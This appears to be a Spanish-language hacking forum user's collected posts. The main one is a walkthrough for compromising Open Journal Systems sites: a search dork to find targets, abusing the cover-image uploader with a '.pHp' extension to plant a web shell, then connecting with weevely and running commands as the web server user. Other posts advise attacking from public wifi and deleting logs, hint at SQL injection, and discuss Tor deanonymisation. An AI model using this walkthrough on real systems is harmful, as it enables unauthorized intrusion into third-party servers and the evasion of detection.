Mensajes

No es imposible se llama estadística, pero vamos cada uno tiene su opinion

http://www.exploit-db.com/exploits/18618/

Version? url(mp)?

No se te entiende nada de lo que vas a hacer pero vamos que,
no no hace falta que tomes muchas medidas anoser que sea algo muy importante,
sino hazlod esde un wifi publico y encuanto estes dentro borra logs.

Hola a todos,
bueno lo primero localizamos el sistema con la siguiente dork

Código [Seleccionar] Expandir

inurl:public/journals/1/
Buscamos la raiz por ejemplo:

Código [Seleccionar] Expandir

https://example.com/blah/lo/que/sea
Nos registramos y marcamos las tres casillas de ROL:
reader, author and reviewer...
creamos un artículo nuevo y usamos el uploader que hay para subir una portada para
nuestro articulo con extension pHp para bypassear el uploader o bien usamos live http headers
vamos a /public/journals/1/ y alli encontraremos nuestra shellcode renombrada a algo como:
cover_article_47_en_US.pHp
Voila!

PD: hasta la version 2.3.6 se puede hacer el upload con un submission en vez de con una portada, sinembargo esta suele estar parcheada.

https://www.htbridge.com/advisory/HTB23079

Código [Seleccionar] Expandir

weevely http://mihost/public/journals/12/cover_article_21_en_US.pHp myshellpass
      ________                      __
     |  |  |  |-----.----.-.--.----'  |--.--.
     |  |  |  |  -__| -__| |  | -__|  |  |  |
     |________|_____|____|___/|____|__|___  | v1.0
                                      |_____|
              Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.

[shell.php] [!] Error: No response
apache@:/var/www/html/public/journals/12 $ id
uid=48(apache) gid=48(apache) grupos=48(apache),100(users)
apache@:/var/www/html/public/journals/12 $ uname
Linux
apache@:/var/www/html/public/journals/12 $
[!] Exiting. Bye ^^

Pasa del puerto 445, que software hay instalado? que versiones? que 0days tienes al alcance? es un servidor web? que cms usan? que servicios corren? que versiones? son vulnerables?

Un saludo!

El fallo principal de TOR creo que viene cuando este se enfrenta a un atacante global, que es capaz de monitorizar el trafico de salida y entrada de la red onion.

Un atacante con estas características (vease gobiernos u otros) lo que debe de hacer es vigilar el tráfico de entrada a la red TOR, vigilar el tráfico de salida de los TOR exit nodes y luego ver donde concuerdan los datos, es decir si tal usuario envio al nodo de entrada tal petición a tal hora y esta coincide con la del nodo de salida... asi van haciendo estadísticas y probabilidades y al final te pueden decir con un 200% de probabilidades que el que estaba viendo porno a traves de TOR eras tu

Por eso es recomendable usar TOR bridge's propios es decir si tienes acceso a un servidor y o tienes configurado para que no deje logs lo puedes convertir en un TOR bridge, al no estar el nodo en las listas es mas dificl que un atacante global pueda monitorear el tráfico ya que le falta un extremo de la red.

Si ademas la informacion que introduces en la red TOR va cifrada pues mas que mejor.

De todos modos si el gobierno tiene la minima sospecha de que un individuo esta haciendo algo perverso a traves de tor simplemente monitorizara el trafico de salida del ordenador del individuo y el de salida de TOR y punto...

Y en esas circunstancias solo te salva que hayas sido muy cuidadoso y tengas todos los discos cifrados con claves reaaaalmente largas y con la ultima tecnologia en cifrado de discos y aún asi lo mas probable es que te cacen y te la hinquen por el culo

Espero haberos acalarado un poco donde creo que reside
la debilidad de TOR.
Un saludo!

pasamos de: concat ----> group_concat

un saludo.

Buenas a todos, como indica el título estoy teniendo bastantes problemas a la hora de desarrollar un pequeño cifrador de texto en ROOT13, no son errores sintácticos ya que el compilador no em dice nada asi que supongo que son errores lógicos a ver si alguien me puede echar un cable.

Código (Java) [Seleccionar] Expandir


import java.util.Scanner;

public class ArraysFor {

public static void main(String[] args) {

char[] abecedario={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','ñ','o','p','q','r','s','t','u','v','w','x','y','z'};
System.out.println("Introduce el numero de caracteres a cifrar en ROOT13");
Scanner scann = new Scanner (System.in);
int maximo = scann.nextInt();
char letra[];
letra = new char[maximo];

for (int k=0; k<maximo; k++) {

letra[k] = scann.next().charAt(0);

}

for (int i=0; i<maximo; i++) {

for (int j=0; j<27; j++) {

if (letra[i] == abecedario[j]) {

int x=0;
x = j + 13;

    if (x>27) {
   
    x = x - 27;
   
    letra[i]=abecedario[x]; }
   
    else {
   
    letra[i]=abecedario[x]; }
   
                }
}
}

for (int g=0; g<maximo; g++){
System.out.println(letra[g]);
}
}

}

Bueno ese es el código lo que queria era cifrar los caracteres de manera que pasaran a ser los que se encuentran 13 posiciones mas a la derecha en el abecedario pero como se puede comprobar cuando ejecutamos el programa no todos los caracteres quedan bien cifdrados, lo raro es que para mi sorpresa hay algunos que si.

Un saludo y espero su ayuda.

Bueno es cuestión de barrer bien el servidor y hacer un buen esquema de como está conectado, con que y como funciona, es decir, hacer un buen mapa.